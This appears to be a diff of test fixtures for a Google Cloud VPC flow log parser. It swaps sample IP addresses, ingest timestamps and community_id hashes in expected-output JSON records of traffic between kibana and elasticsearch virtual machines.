"{\"insertId\":\"ut8lbrffooxzd\",\"jsonPayload\":{\"bytes_sent\":\"250864\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33554,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"247\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500506974Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500506974Z", "end": "2019-06-14T03:49:59.565311154Z", @@ -815,18 +815,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 167939, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 63 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Ee5EHtJfWgzMQEQZSyTFAwZbgus=", + "community_id": "1:NAY9D1IuyJAG+Hm34t3LIlP6/4c=", "bytes": 167939, "name": "default", "transport": "tcp", @@ -848,7 +848,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -885,8 +885,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868415800Z", - "original": "{\"insertId\":\"ut8lbrffooxz8\",\"jsonPayload\":{\"bytes_sent\":\"167939\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33880,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821308944Z\",\"packets_sent\":\"63\",\"reporter\":\"DEST\",\"rtt_msec\":\"3\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469099728Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391200100Z", + "original": 
"{\"insertId\":\"ut8lbrffooxz8\",\"jsonPayload\":{\"bytes_sent\":\"167939\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33880,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821308944Z\",\"packets_sent\":\"63\",\"reporter\":\"DEST\",\"rtt_msec\":\"3\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469099728Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469099728Z", "end": "2019-06-14T03:49:51.821308944Z", @@ -915,17 +915,17 @@ "as": { "number": 49505 }, - "address": "192.0.2.23", + "address": "192.168.2.23", "port": 59679, "bytes": 0, - "ip": "192.0.2.23", + "ip": "192.168.2.23", "packets": 3 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:E803d6gSw9j7F6zoCo0Ka6fb9Iw=", + "community_id": "1:MRmF95Hv0PHOjUO7gqbVt98osmo=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -939,7 +939,7 @@ }, "related": { "ip": [ - "192.0.2.23", + "192.168.2.23", "10.139.99.242" ] }, 
@@ -961,8 +961,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868419800Z", - "original": "{\"insertId\":\"ut8lbrffooxyt\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.0.2.23\",\"src_port\":59679},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391203800Z", + "original": "{\"insertId\":\"ut8lbrffooxyt\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.23\",\"src_port\":59679},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint 
Petersburg\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:45.860349247Z", "end": "2019-06-14T03:40:46.031032701Z", @@ -989,18 +989,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33576, "bytes": 11773, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 94 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:06oSJgliwJ21tZTkobvsHx/M+Pc=", + "community_id": "1:FYaJFSEAKLcBCMFoT6sR5TMHf/s=", "bytes": 11773, "name": "default", "transport": "tcp", @@ -1022,7 +1022,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -1059,8 +1059,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868423800Z", - "original": "{\"insertId\":\"ut8lbrffooxz5\",\"jsonPayload\":{\"bytes_sent\":\"11773\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33576},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"94\",\"reporter\":\"DEST\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510622432Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391207800Z", + "original": 
"{\"insertId\":\"ut8lbrffooxz5\",\"jsonPayload\":{\"bytes_sent\":\"11773\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33576},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"94\",\"reporter\":\"DEST\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510622432Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510622432Z", "end": "2019-06-14T03:49:51.821056075Z", @@ -1087,18 +1087,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33562, "bytes": 65699, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 356 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:oDThWwe999DZ+ToL+uXcjZRio7c=", + "community_id": "1:zUvAQSLCTNOIkUn3aNG0HbYxPv8=", "bytes": 65699, "name": "default", "transport": "tcp", @@ -1120,7 +1120,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -1157,8 +1157,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868427900Z", - "original": "{\"insertId\":\"ut8lbrffooxza\",\"jsonPayload\":{\"bytes_sent\":\"65699\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33562},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393910944Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"192\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074897435Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391211200Z", + "original": 
"{\"insertId\":\"ut8lbrffooxza\",\"jsonPayload\":{\"bytes_sent\":\"65699\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33562},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393910944Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"192\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074897435Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074897435Z", "end": "2019-06-14T03:49:56.393910944Z", @@ -1179,10 +1179,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -1196,7 +1196,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:yZywQ4jpdohOQ9684uKWIPHHP4Y=", + "community_id": "1:pWEbJIgG8triE8M05SRo2qQc0c8=", "bytes": 66029, "name": "default", "transport": "tcp", @@ -1219,7 +1219,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -1255,8 +1255,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868431400Z", - "original": "{\"insertId\":\"ut8lbrffooxyq\",\"jsonPayload\":{\"bytes_sent\":\"66029\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33692},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391215700Z", + "original": 
"{\"insertId\":\"ut8lbrffooxyq\",\"jsonPayload\":{\"bytes_sent\":\"66029\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33692},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -1277,10 +1277,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -1294,7 +1294,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:orgrC+fuNweNF7YN8VWuWIAnY80=", + "community_id": "1:6IVVaT8jMDNLIBHaC8OISRVYWS4=", "bytes": 65154, "name": "default", "transport": "tcp", @@ -1317,7 +1317,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -1353,8 +1353,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868434700Z", - "original": "{\"insertId\":\"ut8lbrffooxz2\",\"jsonPayload\":{\"bytes_sent\":\"65154\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33542},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"360\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150720950Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391221400Z", + "original": 
"{\"insertId\":\"ut8lbrffooxz2\",\"jsonPayload\":{\"bytes_sent\":\"65154\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33542},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"360\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150720950Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150720950Z", "end": "2019-06-14T03:49:59.565272745Z", @@ -1375,10 +1375,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -1392,7 +1392,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:e5cZeUPf9fWSqRY+SUSG302spGE=", + "community_id": "1:MxkJSlVhiCttfItp2SdfNMtLgEY=", "bytes": 13643, "name": "default", "transport": "tcp", @@ -1415,7 +1415,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -1451,8 +1451,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868437700Z", - "original": "{\"insertId\":\"ut8lbrffooxyo\",\"jsonPayload\":{\"bytes_sent\":\"13643\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33970},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"99\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466657665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391226900Z", + "original": 
"{\"insertId\":\"ut8lbrffooxyo\",\"jsonPayload\":{\"bytes_sent\":\"13643\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33970},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"99\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466657665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466657665Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -1472,17 +1472,17 @@ "ip": "10.49.136.133" }, "source": { - "address": "203.0.113.93", + "address": "67.43.156.13", "port": 9243, "bytes": 34509840, "packets": 8690, - "ip": "203.0.113.93" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Y9ynsBV313F1oc4DGZ0sYBcNoQA=", + "community_id": "1:j0PdUfLhQ/r+kYCVQX20c/nfCSc=", "bytes": 34509840, "transport": "tcp", "type": "ipv4", @@ -1496,7 +1496,7 @@ }, "related": { "ip": [ - "203.0.113.93", + "67.43.156.13", "10.49.136.133" ] }, 
@@ -1521,8 +1521,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868441Z", - "original": "{\"insertId\":\"ut8lbrffooxzc\",\"jsonPayload\":{\"bytes_sent\":\"34509840\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":46864,\"protocol\":6,\"src_ip\":\"203.0.113.93\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:29.432367659Z\",\"packets_sent\":\"8690\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"start_time\":\"2019-06-14T03:40:17.343890802Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_s